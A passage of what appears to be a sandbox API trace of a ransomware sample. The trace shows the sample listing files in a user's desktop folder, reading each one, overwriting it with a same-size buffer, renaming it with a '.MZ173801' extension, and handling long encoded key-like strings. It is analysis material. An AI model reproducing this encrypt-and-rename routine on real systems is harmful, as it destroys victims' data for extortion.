ODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0124.177] GetCurrentThreadId () returned 0x1358 [0124.177] GetCurrentThreadId () returned 0x1358 [0124.177] GetCurrentThreadId () returned 0x1358 [0124.177] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\76of.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\76of.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x414 [0124.177] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0124.177] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0124.177] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x180f4 [0124.177] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0124.177] ReadFile (in: hFile=0x414, lpBuffer=0x23a47a0, nNumberOfBytesToRead=0x180f4, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesRead=0x19f6e4*=0x180f4, lpOverlapped=0x0) returned 1 [0124.179] CloseHandle (hObject=0x414) returned 1 [0124.213] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\76of.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\76of.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x414 [0124.215] WriteFile (in: hFile=0x414, lpBuffer=0x23be7d0*, nNumberOfBytesToWrite=0x180f4, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x23be7d0*, lpNumberOfBytesWritten=0x19f6f0*=0x180f4, lpOverlapped=0x0) returned 1 [0124.220] CloseHandle (hObject=0x414) returned 1 [0124.220] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\76of.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\76of.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\76of.jpg.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\76of.jpg.mz173801")) returned 1 [0124.221] GetCurrentThreadId () returned 0x1358 [0124.221] GetCurrentThreadId () returned 0x1358 [0124.221] GetCurrentThreadId () returned 0x1358 [0124.221] GetCurrentThreadId () returned 0x1358 [0124.221] GetCurrentThreadId () returned 0x1358 [0124.221] GetCurrentThreadId () returned 0x1358 [0124.221] FindNextFileW (in: hFindFile=0xa1bc40, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4a9c90, ftCreationTime.dwHighDateTime=0x1d5f08d, ftLastAccessTime.dwLowDateTime=0x677e6cb0, ftLastAccessTime.dwHighDateTime=0x1d5ea8b, ftLastWriteTime.dwLowDateTime=0x677e6cb0, ftLastWriteTime.dwHighDateTime=0x1d5ea8b, nFileSizeHigh=0x0, nFileSizeLow=0x8394, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="a_IiCl.png", cAlternateFileName="")) returned 1 [0124.221] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0124.221] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0124.221] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\a_IiCl.png" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\a_iicl.png"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4a9c90, ftCreationTime.dwHighDateTime=0x1d5f08d, ftLastAccessTime.dwLowDateTime=0x677e6cb0, ftLastAccessTime.dwHighDateTime=0x1d5ea8b, ftLastWriteTime.dwLowDateTime=0x677e6cb0, ftLastWriteTime.dwHighDateTime=0x1d5ea8b, nFileSizeHigh=0x0, nFileSizeLow=0x8394)) returned 1 [0124.221] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.222] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0124.222] GetCurrentThreadId () returned 0x1358 [0124.222] GetCurrentThreadId () returned 0x1358 [0124.222] GetCurrentThreadId () returned 0x1358 [0124.222] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.222] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0124.223] GetCurrentThreadId () returned 0x1358 [0124.223] GetCurrentThreadId () returned 0x1358 [0124.223] GetCurrentThreadId () returned 0x1358 [0124.223] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\a_IiCl.png" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\a_iicl.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x414 [0124.223] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0124.223] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0124.223] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x8394 [0124.223] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0124.223] ReadFile (in: hFile=0x414, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x8394, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x8394, lpOverlapped=0x0) returned 1 [0124.224] CloseHandle (hObject=0x414) returned 1 [0124.225] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\a_IiCl.png" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\a_iicl.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x414 [0124.226] WriteFile (in: hFile=0x414, lpBuffer=0x243bb60*, nNumberOfBytesToWrite=0x8394, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x243bb60*, lpNumberOfBytesWritten=0x19f6f0*=0x8394, lpOverlapped=0x0) returned 1 [0124.228] CloseHandle (hObject=0x414) returned 1 [0124.228] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\a_IiCl.png" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\a_iicl.png"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\a_IiCl.png.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\a_iicl.png.mz173801")) returned 1 [0124.228] GetCurrentThreadId () returned 0x1358 [0124.228] GetCurrentThreadId () returned 0x1358 [0124.228] GetCurrentThreadId () returned 0x1358 [0124.228] GetCurrentThreadId () returned 0x1358 [0124.228] GetCurrentThreadId () returned 0x1358 [0124.229] GetCurrentThreadId () returned 0x1358 [0124.229] FindNextFileW (in: hFindFile=0xa1bc40, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa110b1a0, ftCreationTime.dwHighDateTime=0x1d5e229, ftLastAccessTime.dwLowDateTime=0xe78d1f50, ftLastAccessTime.dwHighDateTime=0x1d5eaea, ftLastWriteTime.dwLowDateTime=0xe78d1f50, ftLastWriteTime.dwHighDateTime=0x1d5eaea, nFileSizeHigh=0x0, nFileSizeLow=0xf4ee, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="DReqJFNMJBL_6uj.mkv", cAlternateFileName="DREQJF~1.MKV")) returned 1 [0124.229] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0124.229] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0124.229] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\DReqJFNMJBL_6uj.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\dreqjfnmjbl_6uj.mkv"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa110b1a0, ftCreationTime.dwHighDateTime=0x1d5e229, ftLastAccessTime.dwLowDateTime=0xe78d1f50, ftLastAccessTime.dwHighDateTime=0x1d5eaea, ftLastWriteTime.dwLowDateTime=0xe78d1f50, ftLastWriteTime.dwHighDateTime=0x1d5eaea, nFileSizeHigh=0x0, nFileSizeLow=0xf4ee)) returned 1 [0124.229] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.229] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0124.229] GetCurrentThreadId () returned 0x1358 [0124.229] GetCurrentThreadId () returned 0x1358 [0124.229] GetCurrentThreadId () returned 0x1358 [0124.230] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.230] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 